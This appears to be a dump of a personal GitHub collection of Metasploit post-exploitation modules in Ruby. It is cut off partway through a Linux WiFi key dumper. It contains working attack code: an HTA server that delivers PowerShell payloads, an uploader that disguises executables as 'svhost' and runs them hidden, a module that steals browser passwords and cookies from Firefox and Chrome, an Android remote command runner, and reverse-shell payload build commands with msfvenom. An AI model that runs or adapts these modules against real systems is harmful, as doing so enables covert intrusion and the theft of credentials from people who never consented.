├── README.md
├── Under-Develop
├── hta-webserver.rb
├── UpAndRun.rb
├── multi_browser_creds_dump.rb
└── korznikov_session_hijack.rb
├── android
└── android_aux.rb
├── linux
└── wifi_dump_linux.rb
└── windows
├── hijack
├── Vault7_cia_debugger_hijack.rb
├── slack_dll_hijack.rb
├── junction_shell_folders_persistance.rb
└── SCRNSAVE_T1180_persistence.rb
├── local-privilege-escalation
├── MSI_privilege_escalation.rb
├── enigma_fodhelper_uac_bypass.rb
├── enigma_AppPath_bypass.rb
└── enigma_fileless_IsolatedCommand.rb
└── auxiliarys
└── bypass_macro_sandbox.rb
/README.md:
--------------------------------------------------------------------------------
1 | # msf-auxiliarys
2 | my collection of metasploit auxiliary post-modules
3 |
4 |
5 | ## Description
6 | this working directory contains diferent metasploit auxiliary modules
7 | writen by me to be of assistence in post-exploitation common tasks.
8 |
9 | ## Download/Install
10 |
11 | - 1º - Download module from github
12 | - 2º - edit module to read the description
13 | - 3º - port module to metasploit database
14 | - 4º - reload metasploit database ..
15 |
16 | service postgresql start
17 | msfdb reinit
18 | msfconsole -q -x 'db_status; reload_all'
19 |
20 |
21 |
22 | [Please read my 'WIKI' for further information](https://github.com/r00t-3xp10it/msf-auxiliarys/wiki/Welcome-to-the-msf-auxiliarys-wiki!)
23 |
24 |
--------------------------------------------------------------------------------
/Under-Develop/hta-webserver.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This module requires Metasploit: http://metasploit.com/download
3 | # Current source: https://github.com/rapid7/metasploit-framework
4 | ##
5 |
6 | class MetasploitModule < Msf::Exploit::Remote
7 | Rank = ManualRanking
8 |
9 | include Msf::Exploit::Remote::HttpServer
10 |
11 | def initialize(info = {})
12 | super(update_info(info,
13 | 'Name' => 'HTA Web Server',
14 | 'Description' => %q(
15 | This module hosts an HTML Application (HTA) that when opened will run a
16 | payload via Powershell. When a user navigates to the HTA file they will
17 | be prompted by IE twice before the payload is executed.
18 | ),
19 | 'License' => MSF_LICENSE,
20 | 'Author' => 'Spencer McIntyre',
21 | 'References' =>
22 | [
23 | ['URL', 'https://www.trustedsec.com/july-2015/malicious-htas/']
24 | ],
25 | # space is restricted by the powershell command limit
26 | 'Payload' => { 'DisableNops' => true, 'Space' => 2048 },
27 | 'Platform' => %w(win),
28 | 'Targets' =>
29 | [
30 | [ 'Powershell x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ],
31 | [ 'Powershell x64', { 'Platform' => 'win', 'Arch' => ARCH_X86_64 } ]
32 | ],
33 | 'DefaultTarget' => 0,
34 | 'DisclosureDate' => 'Oct 06 2016'
35 | ))
36 | end
37 |
38 | def on_request_uri(cli, _request)
39 | print_status('Delivering Payload')
40 | p = regenerate_payload(cli)
41 | data = Msf::Util::EXE.to_executable_fmt(
42 | framework,
43 | target.arch,
44 | target.platform,
45 | p.encoded,
46 | 'hta-psh',
47 | { :arch => target.arch, :platform => target.platform }
48 | )
49 | send_response(cli, data, 'Content-Type' => 'application/hta')
50 | end
51 |
52 | def random_uri
53 | # uri needs to end in .hta for IE to process the file correctly
54 | '/' + Rex::Text.rand_text_alphanumeric(rand(10) + 6) + '.hta'
55 | end
56 | end
57 |
58 |
--------------------------------------------------------------------------------
/Under-Develop/UpAndRun.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 | ##
9 | #
10 | # [ UpAndRun.rb - upload a script or executable and run it ]
11 | # $Id$ V1.0 Author: pedr0 Ubuntu [r00t-3xp10it]
12 | # Hosted By: peterubuntu10[at]sourceforge[dot]net
13 | # http://sourceforge.net/p/myauxiliarymete/wiki/Home/
14 | # ---------------------------------------------
15 | # Based on: [darkoperator & sinn3r] metasploit modules!
16 | # http://www.offensive-security.com/metasploit-unleashed/Building_A_Module
17 | # http://www.offensive-security.com/metasploit-unleashed/Useful_API_Calls
18 | # http://www.rubydoc.info/github/rapid7/metasploit-framework/index
19 | # (the only CORE/API documentation available to study) :(
20 | #
21 | ##
22 |
23 |
24 |
25 | class MetasploitModule < Msf::Post
26 | Rank = NormalRanking
27 |
28 |
29 |
30 | # ------------------------------------
31 | # Building Metasploit/Armitage info/GUI
32 | # ------------------------------------
33 | def initialize(info={})
34 | super(update_info(info,
35 | 'Name' => '[ UpAndRun.rb - upload a script or executable and run it ]',
36 | 'Description' => %q{
37 | this module needs will upload a payload onto target system,
38 | using an existence meterpreter open session (post-exploitation)
39 | and then run it in a hidden chanalized windows.
40 |
41 | },
42 | 'License' => UNKNOWN_LICENSE,
43 | 'Author' =>
44 | [
45 | 'peterubuntu10[at]sourceforge[dot]net',
46 | ],
47 |
48 | 'Version' => '$Revision: 1.1',
49 | 'releasedDate' => 'ago 4 2016',
50 | 'Platform' => 'windows',
51 | 'Arch' => 'x86_x64',
52 | 'References' =>
53 | [
54 | [ 'URL', 'http://sourceforge.net/users/peterubuntu10' ],
55 | [ 'URL', 'http://sourceforge.net/projects/myauxiliarymete/?source=navbar' ],
56 | [ 'URL', 'http://www.offensive-security.com/metasploit-unleashed/Building_A_Module' ],
57 | [ 'URL', 'http://oldmanlab.blogspot.pt/p/meterpreter-api-cheat-sheet.html' ],
58 | [ 'URL', 'http://www.rubydoc.info/github/rapid7/metasploit-framework/index' ],
59 | [ 'URL', 'https://github.com/rapid7/metasploit-framework/tree/master/modules/post' ],
60 | [ 'URL', 'https://www.facebook.com/Backtrack.Kali' ],
61 | [ 'URL', 'http://www.r00tsect0r.net' ]
62 | ],
63 | 'DefaultOptions' =>
64 | {
65 | 'SESSION' => '1', # Default its to run againts session 1
66 | },
67 | 'SessionTypes' => [ 'shell', 'meterpreter' ]
68 |
69 | ))
70 |
71 | register_options(
72 | [
73 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
74 | OptString.new('upload', [ false, 'Executable or script to upload to target host.']),
75 | OptString.new('path', [ false, 'Path on target to upload executable, default is %SYSTEM32%.'])
76 | ], self.class)
77 |
78 | end
79 |
80 |
81 |
82 |
83 | # -------------------------------------------
84 | # variable declaration - metasploit API calls
85 | # -------------------------------------------
86 | session = client
87 | trgloc = datastore['path']
88 | file = datastore['upload']
89 | sysnfo = session.sys.config.sysinfo
90 |
91 |
92 |
93 |
94 |
95 | unsupported if client.platform !~ /win32|win64/i
96 | # -------------------------------------
97 | # check for proper Meterpreter Platform
98 | # -------------------------------------
99 | def unsupported
100 | sys = session.sys.config.sysinfo
101 | print_error("Operative System: #{sys['OS']}")
102 | print_error("This auxiliary only works against windows systems!")
103 | print_error("Please execute [info] for further information...")
104 | raise Rex::Script::Completed
105 | print_line("")
106 | end
107 |
108 |
109 |
110 |
111 | # ----------------------------------------------------------
112 | # upload file to target (system32 OR other location inputed)
113 | # and execute it on a hidden channelized windows
114 | # ----------------------------------------------------------
115 | def upload(session,file,trgloc)
116 | if not ::File.exists?(file)
117 | raise "#{file} to Upload does not exists!"
118 | else
119 | if trgloc == ""
120 | location = session.fs.file.expand_path("%SYSTEM32%")
121 | else
122 | location = trgloc
123 |
124 | end
125 | begin
126 | ext = file[file.rindex(".") .. -1]
127 | if ext and ext.downcase == ".exe"
128 | fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
129 | else
130 | fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
131 | end
132 | print_line("")
133 | print_status("Uploading => #{file}...")
134 | session.fs.file.upload_file("#{fileontrgt}","#{file}")
135 | print_status("#{file} uploaded! to => #{fileontrgt}")
136 |
137 | r=''
138 | r = session.sys.process.execute("cmd.exe /c start #{fileontrgt}", nil, {'Hidden' => true, 'Channelized' => true})
139 | print_good("Execute => #{file}")
140 | print_status("agent uploaded and executed successfully!")
141 | print_line("")
142 |
143 | # close channel when done
144 | r.channel.close
145 | r.close
146 | rescue ::Exception => e
147 | print_status("Error uploading file #{file}: #{e.class} #{e}")
148 | print_line("")
149 | raise e
150 | end
151 | end
152 | return fileontrgt
153 | end
154 |
--------------------------------------------------------------------------------
/Under-Develop/multi_browser_creds_dump.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 | #########
9 | require 'rex'
10 | require 'msf/core'
11 | require 'msf/core/post/common'
12 | require 'msf/core/post/windows/priv'
13 | require 'set'
14 |
15 | #########
16 | class MetasploitModule < Msf::Post
17 |
18 | include Msf::Post::File
19 | include Msf::Post::Common
20 | include Msf::Post::Windows::Priv
21 |
22 | #########
23 |
24 | def initialize(info = {})
25 | super(update_info(info,
26 | 'Name' => 'multi_browser_creds_dump [Webbrowsers passwords]',
27 | 'Description' => %q{
28 | This module gets passwords from Firefox and Google Chrome
29 | },
30 | 'License' => 'UNKNOWN_LICENSE',
31 | 'Platform' => ['win'],
32 | 'SessionTypes' => ['meterpreter'],
33 | 'Author' => ['r00t-3xp10it, Milton-barra'],
34 | 'DisclosureDate' => 'mai 6 2017',
35 |
36 |
37 | 'DefaultOptions' =>
38 | {
39 | 'SESSION' => '1',
40 | 'DOWNLOAD_PATH' => '/root',
41 | }
42 | ))
43 |
44 | register_options(
45 | [
46 | OptBool.new('FIREFOX', [false, 'Get Firefox passwords', false]),
47 | OptBool.new('CHROME', [false, 'Get Google Chrome passwords', false]),
48 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
49 | OptString.new('DOWNLOAD_PATH', [false, 'default logs download location (local)'])
50 | ], self.class)
51 | end
52 |
53 |
54 | # ------------------------
55 | # DUMP DATA FROM FIREFOX
56 | # -----------------------
57 | def firefox
58 |
59 | # variable declarations
60 | profile =''
61 | pathexe_firefox = "%programfiles%\\Mozilla Firefox\\firefox.exe"
62 | outpath = datastore['DOWNLOAD_PATH']
63 | path ="%appdata%\\Mozilla\\Firefox"
64 | # check for proper settings enter by user ...
65 | if datastore['FIREFOX'] == 'nil' || datastore['DOWNLOAD_PATH'] == 'nil'
66 | print_error("Please set FIREFOX | DOWNLOAD_PATH options ..")
67 | return
68 | else
69 | print_status("Searching for Firefox path ..")
70 | end
71 |
72 | #check if firefox.exe exists
73 | if session.fs.file.exist?(pathexe_firefox)
74 | print_good(" Firefox directoy found.")
75 | else
76 | print_error("Firefox path not found.")
77 | return
78 | end
79 |
80 | # check if file exist on target system
81 | if session.fs.file.exist?(path + "\\profiles.ini")
82 |
83 | # download file from target system
84 | client.fs.file.download("#{outpath}/profiles.ini","#{path}\\profiles.ini")
85 |
86 | # regex to find directory of default profile
87 | profile_path = File.read("#{outpath}/profiles.ini")
88 | profile_path.scan(/Path=Profiles\/(.*)\r/) do |match|
89 | profile_path = match
90 | end
91 | final_path = path + "\\Profiles\\#{profile_path[0]}#{profile_path[1]}"
92 | File.delete("#{outpath}/profiles.ini")
93 | print_good(" Found default profile directory.")
94 | else
95 | print_error("Firefox path not found.")
96 | return
97 | end
98 |
99 | credsfirefox = [
100 | 'places.sqlite',
101 | 'key3.db',
102 | 'logins.json',
103 | 'cookies.sqlite',
104 | 'permissions.sqlite',
105 | 'formhistory.sqlite'
106 | ]
107 |
108 | # loop funtion to download files from target system
109 | session.response_timeout=120
110 | credsfirefox.each do |dump|
111 | if session.fs.file.exist?("#{final_path}\\#{dump}")
112 | r = client.fs.file.download("#{outpath}/#{sysinfo['Computer']}/Firefox/#{dump}","#{final_path}\\#{dump}")
113 | print_status(" Downloading => #{dump}")
114 | else
115 | next
116 | end
117 | end
118 | print_good(" Files downloaded successfully.")
119 | print_line("")
120 |
121 | rescue ::Exception => e
122 | #print_error("Error Running Command: #{e.class} #{e}")
123 | print_error("Error copying the file.")
124 | end
125 |
126 |
127 |
128 | # ---------------------
129 | # DUMP DATA FROM CHROME
130 | # ---------------------
131 | def google_chrome
132 |
133 | r=''
134 | # variable declarations
135 | outpath = datastore['DOWNLOAD_PATH']
136 | sysnfo = session.sys.config.sysinfo
137 | pathexe="%programfiles%\\Google\\Chrome\\Application\\chrome.exe"
138 | #print_line("#{pathexe}")
139 | datapath="%homepath%\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
140 |
141 | # check for proper settings enter by user ...
142 | if datastore['CHROME'] == 'nil' || datastore['DOWNLOAD_PATH'] == 'nil'
143 | print_error("Please set CHROME | DOWNLOAD_PATH options...")
144 | return
145 | else
146 | print_status("Searching for Google Chrome path...")
147 | end
148 |
149 | #check if chrome.exe exists
150 | if session.fs.file.exist?(pathexe)
151 | print_good(" Google Chrome directoy found.")
152 | else
153 | print_error("Google Chrome path not found.")
154 | return
155 | end
156 |
157 | # list of arrays to be executed
158 | creds = [
159 | 'History',
160 | 'Login Data',
161 | 'Cookies',
162 | 'Web Data'
163 | ]
164 |
165 |
166 | # loop funtion to download files from target system
167 | session.response_timeout=120
168 | creds.each do |dump|
169 | if session.fs.file.exist?("#{datapath}\\#{dump}")
170 | r = client.fs.file.download("#{outpath}/#{sysnfo['Computer']}/Google Chrome/#{dump}","#{datapath}\\#{dump}")
171 | print_status(" Downloading => #{dump}")
172 | else
173 | next
174 | end
175 | end
176 | print_good(" Files downloaded successfully.")
177 | print_line("")
178 | # error exception funtion
179 | rescue ::Exception => e
180 | #print_error("Error Running Command: #{e.class} #{e}")
181 | print_error(" Error copying the file.")
182 | end
183 |
184 |
185 |
186 | #
187 | # MAIN MENU DISPLAYS
188 | #
189 | def run
190 | session = client
191 |
192 | # Variable declarations (msf API calls)
193 | oscheck = client.fs.file.expand_path("%OS%")
194 | sysnfo = session.sys.config.sysinfo
195 | runtor = client.sys.config.getuid
196 | runsession = client.session_host
197 | directory = client.fs.dir.pwd
198 |
199 |
200 | # Print banner and scan results on screen
201 | print_line(" +----------------------------------------------+")
202 | print_line(" | multi browser creds dump [dump passwords] |")
203 | print_line(" | Author : r00t-3xp10it | Milton-barra |")
204 | print_line(" +----------------------------------------------+")
205 | print_line("")
206 | print_line(" Running on session : #{datastore['SESSION']}")
207 | print_line(" Computer : #{sysnfo['Computer']}")
208 | print_line(" Operative System : #{sysnfo['OS']}")
209 | print_line(" Target IP addr : #{runsession}")
210 | print_line(" Payload directory : #{directory}")
211 | print_line(" Client UID : #{runtor}")
212 | print_line("")
213 | print_line("")
214 |
215 |
216 | #
217 | # the 'def check()' funtion that rapid7 requires to accept new modules.
218 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
219 | #
220 | # check for proper operative system (windows-not-wine)
221 | if not oscheck == "Windows_NT"
222 | print_error("[ ABORT ]: This module only works againts windows systems")
223 | return nil
224 | end
225 | #
226 | # check for proper session (meterpreter) the non-return of sysinfo command
227 | # reveals that we are not on a meterpreter session!
228 | #
229 | if not sysinfo.nil?
230 | print_status("Running module against: #{sysnfo['Computer']}")
231 | else
232 | print_error("[ ABORT ]: This module only works in meterpreter sessions!")
233 | return nil
234 | end
235 | #
236 | # elevate session privileges befor runing options
237 | #
238 | client.sys.config.getprivs.each do |priv|
239 | end
240 |
241 |
242 |
243 | #
244 | # Selected settings to run
245 | #
246 |
247 | if datastore['FIREFOX']
248 | firefox # jump to firefox funtion
249 | end
250 |
251 | if datastore['CHROME']
252 | google_chrome # jump to google chrome function
253 | end
254 | end
255 | end
256 |
--------------------------------------------------------------------------------
/android/android_aux.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 |
10 | ##
11 | # [ android_aux.rb ]
12 | # Author: pedr0 Ubuntu [r00t-3xp10it]
13 | # tested on: android 4.0
14 | # P.O.C: https://resources.infosecinstitute.com/lab-android-exploitation-with-kali/
15 | #
16 | #
17 | # [ POST-EXPLOITATION MODULE DESCRIPTION ]
18 | # Android/meterpreter payloads does not allow users to manipulate target file system. This msf post-exploitation
19 | # module will allow users to input/execute remotely commands in target system, display on screen the command output
20 | # and store outputs (set STORE_LOOT true) into sellected loot folder (set LOOT_FOLDER /root)
21 | #
22 | #
23 | # [ MODULE OPTIONS ]
24 | # The session number to run this module on => set SESSION 3
25 | # Store session outputs to loot folder? => set STORE_LOOT true
26 | # The full path [local] where to store logs => set LOOT_FOLDER /root
27 | # The bash command to be executed remotely => set EXEC_COMMAND
28 | # example: set EXEC_COMMAND ls -AR SD card/Pictures
29 | # example: set EXEC_COMMAND mkdir SD card/Download/testDir
30 | #
31 | #
32 | # [ PORT MODULE TO METASPLOIT DATABASE ]
33 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/android/manage/android_aux.rb
34 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/android/manage/android_aux.rb
35 | # Manually Path Search: root@kali:~# locate modules/post/android/manage
36 | #
37 | #
38 | # [ LOAD/USE AUXILIARY ]
39 | # meterpreter > background
40 | # msf exploit(handler) > use post/android/manage/android_aux
41 | # msf post(android_aux) > info
42 | # msf post(android_aux) > show options
43 | # msf post(android_aux) > set [option(s)]
44 | # msf post(android_aux) > exploit
45 | #
46 | #
47 | # [ HINT ]
48 | # In some linux distributions postgresql needs to be started and
49 | # metasploit database deleted/rebuild to be abble to load module.
50 | # 1 - service postgresql start
51 | # 2 - msfdb reinit (important - required)
52 | # 3 - msfconsole -x 'db_status; reload_all'
53 | ##
54 |
55 |
56 |
57 | #
58 | # Metasploit Module librarys to load ..
59 | #
60 | require 'rex'
61 | require 'msf/core'
62 | require 'msf/core/post/common'
63 |
64 |
65 |
66 | #
67 | # Metasploit Class name and mixins ..
68 | #
69 | class MetasploitModule < Msf::Post
70 | Rank = ExcellentRanking
71 |
72 | include Msf::Post::File
73 | include Msf::Post::Common
74 | include Msf::Post::Android
75 | include Msf::Post::Android::System
76 |
77 |
78 |
79 | #
80 | # The 'def initialize()' funtion ..
81 | # Building Metasploit/Armitage info GUI/CLI description
82 | #
83 | def initialize(info={})
84 | super(update_info(info,
85 | 'Name' => 'execute commands in android',
86 | 'Description' => %q{
87 | Android/meterpreter payloads does not allow users to manipulate target file system. This msf post-exploitation module will allow users to input/execute remotely commands in target system, display on screen the command output and store outputs (set STORE_LOOT true) into sellected loot folder (set LOOT_FOLDER /root)
88 | },
89 | 'License' => UNKNOWN_LICENSE,
90 | 'Author' =>
91 | [
92 | 'Module Author: r00t-3xp10it', # post-module author :D
93 | ],
94 |
95 | 'Version' => '$Revision: 1.4',
96 | 'DisclosureDate' => '26 jun 2018',
97 | 'Platform' => 'android',
98 | 'Arch' => ARCH_DALVIK,
99 | 'Privileged' => 'false', # root privileges required?
100 | 'Targets' =>
101 | [
102 | [ 'android' ]
103 | ],
104 | 'DefaultTarget' => '1', # default its to run againts android targets
105 | 'References' =>
106 | [
107 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
108 | [ 'URL', 'http://rapid7.github.io/metasploit-framework/api/' ],
109 | [ 'URL', 'https://resources.infosecinstitute.com/lab-android-exploitation-with-kali/' ]
110 | ],
111 | 'DefaultOptions' =>
112 | {
113 | 'SESSION' => '1', # Default its to run againts session 1
114 | },
115 | 'SessionTypes' => [ 'meterpreter' ]
116 |
117 | ))
118 |
119 | register_options(
120 | [
121 | OptString.new('SESSION', [ true, 'The session number to run this module on', '1']),
122 | OptBool.new('STORE_LOOT', [false, 'Store session outputs to loot folder?', false]),
123 | OptString.new('LOOT_FOLDER', [ false, 'The full path [local] where to store logs', '/root']),
124 | OptString.new('EXEC_COMMAND', [true, 'The bash command to be executed remotely', 'ls -A'])
125 | ], self.class)
126 |
127 | end
128 |
129 |
130 |
131 | #
132 | # The 'def run()' funtion ..
133 | # Running sellected modules against session target.
134 | #
135 | def run
136 |
137 | #
138 | # Variable declarations (msf API calls)
139 | #
140 | session = client
141 | sysnfo = session.sys.config.sysinfo
142 | runtor = client.sys.config.getuid
143 | runsession = client.session_host
144 | directory = client.fs.dir.pwd
145 | build_prop = get_build_prop # Grab android version release
146 | #
147 | # draw module banner ..
148 | #
149 | print_line("+-------------------------------------+")
150 | print_line("| ANDROID AUXILIARY POST-MODULE |")
151 | print_line("| Author : r00t-3xp10it (ssa-redteam) |")
152 | print_line("+-------------------------------------+")
153 | print_line("")
154 | print_line(" Running on session : #{datastore['SESSION']}")
155 | print_line(" Target IP addr : #{runsession}")
156 | print_line(" Payload directory : #{directory}")
157 | print_line(" Operative System : #{sysnfo['OS']}")
158 | print_line(" Client UID : #{runtor}")
159 | print_line("")
160 | print_line("")
161 |
162 |
163 | #
164 | # check for proper config settings enter
165 | # to prevent 'unset all' from deleting default options ..
166 | #
167 | if datastore['EXEC_COMMAND'] == 'nil'
168 | print_error("[ABORT]: Options not configurated correctly!")
169 | print_warning("Please set EXEC_COMMAND ")
170 | return nil
171 | end
172 | #
173 | # Check for proper target operative system (Android)
174 | #
175 | unless sysinfo['OS'] =~ /Android/ || sysinfo['OS'] =~ /android/
176 | print_error("[ABORT]: This module only works againts Android systems!")
177 | return nil
178 | end
179 | #
180 | # check for proper session (meterpreter)
181 | # the non-return of sysinfo command reveals that we are not on a meterpreter session!
182 | #
183 | unless sysinfo.nil?
184 | android_version = Gem::Version.new(build_prop['ro.build.version.release'])
185 | print_status("Running module against: android #{android_version}")
186 | Rex::sleep(0.5)
187 | else
188 | print_error("[ABORT]: This module only works in meterpreter sessions!")
189 | return nil
190 | end
191 |
192 |
193 | #
194 | # Single_command to execute remotely (user inputs) ..
195 | # Example: set EXEC_COMMAND
196 | #
197 | exec_comm = datastore['EXEC_COMMAND']
198 | # check if exec_command option its configurated ..
199 | unless exec_comm.nil?
200 | print_status("Executing: #{exec_comm}")
201 | Rex::sleep(0.5)
202 | # bash command to be executed remotely ..
203 | single_comm = cmd_exec("#{exec_comm}")
204 | # print data on screen
205 | print_line("***************************************")
206 | print_line("#{single_comm}")
207 | print_line("***************************************")
208 | Rex::sleep(0.2)
209 | #
210 | # store data into a local variable (data_dump) ..
211 | # to be able to write the logfile later.
212 | #
213 | data_dump=''
214 | data_dump << "Executing: #{exec_comm}\n"
215 | data_dump << "***************************************\n"
216 | data_dump << single_comm
217 | data_dump << "***************************************\n\n"
218 | end
219 |
220 |
221 | #
222 | # Store (data_dump) contents into loot folder? (local) ..
223 | # IF sellected previous the option (set STORE_LOOT true)
224 | #
225 | if datastore['STORE_LOOT'] == true
226 | print_warning("Writing session logfile!")
227 | Rex::sleep(1.0)
228 | unless datastore['LOOT_FOLDER'] == 'nil'
229 | # generating random logfile name (6 chars)
230 | rand = Rex::Text.rand_text_alpha(6)
231 | loot_folder = datastore['LOOT_FOLDER']
232 | # create session output logfile
233 | File.open("#{loot_folder}/android_#{rand}.log", "w") do |f|
234 | f.write("#{data_dump}")
235 | f.close
236 | print_good("Logfile: #{loot_folder}/android_#{rand}.log")
237 | end
238 | else
239 | print_error("[ABORT]: Options not configurated correctly!")
240 | print_warning("Please set LOOT_FOLDER ")
241 | end
242 | end
243 |
244 | #
245 | # end of the 'def run()' funtion ..
246 | #
247 | end
248 |
249 | # exit module execution (_EOF) ..
250 | end
251 |
--------------------------------------------------------------------------------
/linux/wifi_dump_linux.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 |
10 | ##
11 | # [ wifi_dump_linux.rb - ESSID credentials dump (wpa/wep) ]
12 | # Author: pedr0 Ubuntu [r00t-3xp10it]
13 | # tested on: linux Kali 2.0
14 | #
15 | #
16 | # [ POST-EXPLOITATION MODULE DESCRIPTION ]
17 | # This module collects 802-11-Wireless-Security credentials such as Access-Point name and
18 | # Pre-Shared-Key from your target Linux machine using /etc/NetworkManager/system-connections/
19 | # files and displays a list of ESSIDs emitting signal (advanced option). This module also
20 | # stores the dumped data into msf4/loot folder (advanced option).
21 | # HINT: This module requires root privileges to run in non-Kali distros ..
22 | #
23 | #
24 | # [ MODULE OPTIONS ]
25 | # The session number to run this module on => set SESSION 3
26 | # Dump credentials from remote system? => set DUMP_CREDS true
27 | # Store dumped data to msf4/loot folder? => set STORE_LOOT true
28 | # Display list of ESSIDs emitting signal? => set ESSID_DUMP true
29 | # The default path for network connections => set REMOTE_DIR /etc/NetworkManager/system-connections
30 | #
31 | #
32 | # [ PORT MODULE TO METASPLOIT DATABASE ]
33 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/linux/gather/wifi_dump_linux.rb
34 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/linux/gather/wifi_dump_linux.rb
35 | # Manually Path Search: root@kali:~# locate modules/post/linux/gather
36 | #
37 | #
38 | # [ LOAD/USE AUXILIARY ]
39 | # meterpreter > background
40 | # msf exploit(handler) > use post/linux/gather/wifi_dump_linux
41 | # msf post(wifi_dump_linux) > info
42 | # msf post(wifi_dump_linux) > show options
43 | # msf post(wifi_dump_linux) > show advanced options
44 | # msf post(wifi_dump_linux) > set [option(s)]
45 | # msf post(wifi_dump_linux) > exploit
46 | #
47 | #
48 | # [ BUILD PAYLOAD ]
49 | # msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=666 -f raw -o agent.py
50 | # OR: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=666 -f c -o template.c
51 | # gcc -fno-stack-protector -z execstack template.c -o agent
52 | #
53 | #
54 | # [ HINT ]
55 | # In some linux distributions postgresql needs to be started and
56 | # metasploit database deleted/rebuild to be abble to load module.
57 | # 1 - service postgresql start
58 | # 2 - msfdb reinit (optional)
59 | # 3 - msfconsole -q -x 'reload_all'
60 | ##
61 |
62 |
63 |
64 |
65 |
66 | #
67 | # Module Dependencies/requires
68 | #
69 | require 'rex'
70 | require 'msf/core'
71 | require 'msf/core/post/common'
72 |
73 |
74 |
75 | #
76 | # Metasploit Class name and includes
77 | #
78 | class MetasploitModule < Msf::Post
79 | Rank = ExcellentRanking
80 |
81 | include Msf::Post::File
82 | include Msf::Post::Linux::Priv
83 | include Msf::Post::Linux::System
84 |
85 |
86 |
87 | #
88 | # Building Metasploit/Armitage info GUI/CLI
89 | #
90 | def initialize(info={})
91 | super(update_info(info,
92 | 'Name' => 'ESSID linux credentials dump (wpa/wep)',
93 | 'Description' => %q{
94 | This module collects 802-11-Wireless-Security credentials such as Access-Point name and Pre-Shared-Key from your target Linux machine using /etc/NetworkManager/system-connections/ files and displays a list of ESSIDs emitting signal (advanced option). This module also stores the dumped data into msf4/loot folder (advanced option).
95 | },
96 | 'License' => UNKNOWN_LICENSE,
97 | 'Author' =>
98 | [
99 | 'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author
100 | ],
101 |
102 | 'Version' => '$Revision: 1.6',
103 | 'DisclosureDate' => 'jun 8 2017',
104 | 'Platform' => 'linux',
105 | 'Arch' => 'x86_x64',
106 | 'Privileged' => 'true', # root privs required in non-Kali distros
107 | 'Targets' =>
108 | [
109 | [ 'Linux' ]
110 | ],
111 | 'DefaultTarget' => '1', # default its to run againts Kali 2.0
112 | 'References' =>
113 | [
114 | [ 'URL', 'https://github.com/r00t-3xp10it' ],
115 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ]
116 | ],
117 | 'DefaultOptions' =>
118 | {
119 | 'SESSION' => '1', # Default its to run againts session 1
120 | 'REMOTE_DIR' => '/etc/NetworkManager/system-connections',
121 | },
122 | 'SessionTypes' => [ 'meterpreter' ]
123 |
124 | ))
125 |
126 | register_options(
127 | [
128 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
129 | OptString.new('DUMP_CREDS', [ false, 'Dump credentials from remote system?', false])
130 | ], self.class)
131 |
132 | register_advanced_options(
133 | [
134 | OptBool.new('STORE_LOOT', [false, 'Store dumped data to msf4/loot folder?', false]),
135 | OptBool.new('ESSID_DUMP', [false, 'Display list of ESSIDs emitting signal?', false]),
136 | OptString.new('REMOTE_DIR', [ true, 'The default path for network connections'])
137 | ], self.class)
138 |
139 | end
140 |
141 |
142 |
143 | #
144 | # DUMP WPA/WEP CREDENTIALS FROM TARGET ..
145 | #
146 | def ls_stage1
147 |
148 | rpath = datastore['REMOTE_DIR'] # /etc/NetworkManager/system-connections
149 | #
150 | # check for proper config settings enter...
151 | # to prevent 'unset all' from deleting default options...
152 | #
153 | if datastore['DUMP_CREDS'] == 'nil'
154 | print_error("Options not configurated correctly ..")
155 | print_warning("Please set DUMP_CREDS option ..")
156 | return nil
157 | else
158 | print_status("Dumping remote wpa/wep credentials ..")
159 | Rex::sleep(1.0)
160 | end
161 |
162 | #
163 | # Check if NetworkManager path exists ..
164 | #
165 | if not File.directory?(rpath)
166 | print_error("Remote path: #{rpath} not found ..")
167 | print_error("Please set 'REMOTE_DIR' advanced option to point to another path!")
168 | print_line("")
169 | return nil
170 | end
171 |
172 | #
173 | # Dump wifi credentials and network info from target system (wpa/wep)
174 | #
175 | data_dump=''
176 | wpa_out = cmd_exec("sudo grep psk= #{rpath}/*")
177 | wep_out = cmd_exec("sudo grep wep-key0= #{rpath}/*")
178 | # store data in variable (loot funtion)
179 | data_dump << wpa_out
180 | data_dump << wep_out
181 | Rex::sleep(1.0)
182 |
183 | #
184 | # Display results on screen (wpa|wep) ..
185 | #
186 | print_line("")
187 | print_line("WPA CREDENTIALS:")
188 | print_line("----------------")
189 | print_line(wpa_out)
190 | print_line("")
191 | Rex::sleep(0.5)
192 | print_line("WEP CREDENTIALS:")
193 | print_line("----------------")
194 | print_line(wep_out)
195 | print_line("")
